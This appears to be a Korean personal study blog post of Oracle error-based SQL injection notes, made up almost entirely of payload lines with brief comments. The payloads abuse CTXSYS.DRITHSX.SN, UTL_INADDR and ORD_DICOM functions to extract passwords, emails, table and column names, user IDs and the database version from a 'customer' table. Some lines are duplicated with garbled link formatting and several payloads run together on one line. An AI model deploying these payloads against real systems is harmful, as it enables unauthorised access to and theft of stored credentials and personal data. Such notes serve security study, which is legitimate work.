에러베이스드 테스트
' and ctxsys.drithsx.sn(user,(select password from customer where name='mas9623'))=1 --
' and ctxsys.drithsx.sn(user,(select email from customer where name='12345'))=1 --
' and UTL_INADDR.GET_HOST_NAME((select password from customer where name="123123")) 됨 UTL_INAADR.GET_HOST_ADDRESS((원하는 서브쿼리 내용)) ORDSYS.ORD_DICOM.GETMAPPINGXPATH((원하는 서브쿼리 내용),user,user) CTXSYS.DRITHSX.SN(user,(원하는 서브쿼리 내용)) 됨
UTL_INADDR.GET_HOST_NAME((select password from customer where name="123123")) 됨
UTL_INAADR.GET_HOST_ADDRESS((원하는 서브쿼리 내용))
ORDSYS.ORD_DICOM.GETMAPPINGXPATH((원하는 서브쿼리 내용),user,user)
[CTXSYS.DRITHSX.SN](<http://ctxsys.drithsx.sn/>)(user,(원하는 서브쿼리 내용)) 됨
' and [CTXSYS.DRITHSX.SN](<http://ctxsys.drithsx.sn/>)(user,(SELECT table_name FROM (SELECT table_name, ROWNUM AS RNUM FROM user_tables) WHERE RNUM=6))=1 -- 6번째로 만든 테이블 명 알아내기
' and [CTXSYS.DRITHSX.SN](<http://ctxsys.drithsx.sn/>)(user,(SELECT COUNT(COLUMN_NAME) FROM all_tab_columns WHERE table_name='CUSTOMER'))=1 -- CUSTOMER 테이블의 컬럼갯수 알아내기 ( 대소문자 구별 )
' and [CTXSYS.DRITHSX.SN](<http://ctxsys.drithsx.sn/>)(user,(SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS RNUM FROM all_tab_columns where TABLE_NAME='CUSTOMER') WHERE RNUM=1))=1 -- 커스터머의 컬럼명 알아내기
' and [CTXSYS.DRITHSX.SN](<http://ctxsys.drithsx.sn/>)(user,(SELECT name FROM (SELECT name, ROWNUM AS RNUM FROM customer) WHERE RNUM=25))=1 --25번째 데이터에 있는 아이디 알아내기
' and CTXSYS.DRITHSX.SN(user,(select password from customer where name='123123'))=1 -- ' and UTL_INADDR.GET_HOST_NAME((select password from customer where name='123123'))=1 -- 특정 비밀번호 알아내기
' and ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select password from customer where name='123123'),user,user)=1 -- 안되는듯 ' and UTL_INAADR.GET_HOST_ADDRESS((select password from customer where name='123123'))=1 -- 안되는듯
' and CTXSYS.DRITHSX.SN(user,(select banner from v$version WHERE banner LIKE '%Oracle%'))=1 -- 오라클 버전 알아내기
' and CTXSYS.DRITHSX.SN(user,(SELECT table_name FROM (SELECT table_name, ROWNUM AS RNUM FROM user_tables) WHERE RNUM=6))=1 -- 6번째로 만든 테이블 명 알아내기 ' and CTXSYS.DRITHSX.SN(user,(SELECT COUNT(COLUMN_NAME) FROM all_tab_columns WHERE table_name='CUSTOMER'))=1 -- CUSTOMER 테이블의 컬럼갯수 알아내기 ( 대소문자 구별 )
' and CTXSYS.DRITHSX.SN(user,(SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS RNUM FROM all_tab_columns where TABLE_NAME='CUSTOMER') WHERE RNUM=1))=1 -- 커스터머의 컬럼명 알아내기
' and CTXSYS.DRITHSX.SN(user,(SELECT name FROM (SELECT name, ROWNUM AS RNUM FROM customer) WHERE RNUM=25))=1 --25번째 데이터에 있는 아이디 알아내기
'공부 > 혼자 삽질 보관함' 카테고리의 다른 글
| AWS에 CentOS,Oracle 환경구축 (0) | 2023.07.17 |
|---|---|
| [SQL Injection] order by (0) | 2023.07.17 |
| [SQL Injection] Union based (0) | 2023.03.30 |